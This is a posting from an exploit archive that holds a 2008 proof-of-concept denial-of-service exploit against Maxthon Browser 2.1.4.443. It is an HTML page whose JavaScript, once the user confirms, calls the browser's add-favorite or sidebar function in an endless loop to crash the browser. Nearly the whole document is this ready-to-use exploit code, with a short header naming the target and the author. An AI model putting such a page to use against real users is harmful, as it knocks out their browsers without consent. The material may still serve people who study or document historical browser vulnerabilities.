Home / exploitsPDF  

maxthon-dos.txt

Posted on 09 September 2008

<!-- Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC Summary: Maxthon Browser is a powerful tabbed browser built for all users. Besides basic browsing functionality, Maxthon Browser provides a rich set of features to improve your surfing experience. Product web page: http://www.maxthon.com by Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 09.09.2008 --> <html> <title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</Title> <head> <body> <script type="text/javascript"> alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC by LiquidWorm"); function thricer() { title="Attack"; url="http://www.thrice.net/"; if (window.sidebar) { window.sidebar.addPanel(title, url,""); } else if( window.external ) { window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return (true); } } var answ = confirm("Press OK to start exploitation Press Cancel to skip exploitation"); if (answ == true) { for (x=0; x<x+1; x++) thricer(); } else { alert("Allrighty Then!"); window.location.href = "http://www.disneyland.com"; } </script> </body> </head> </html>

 

TOP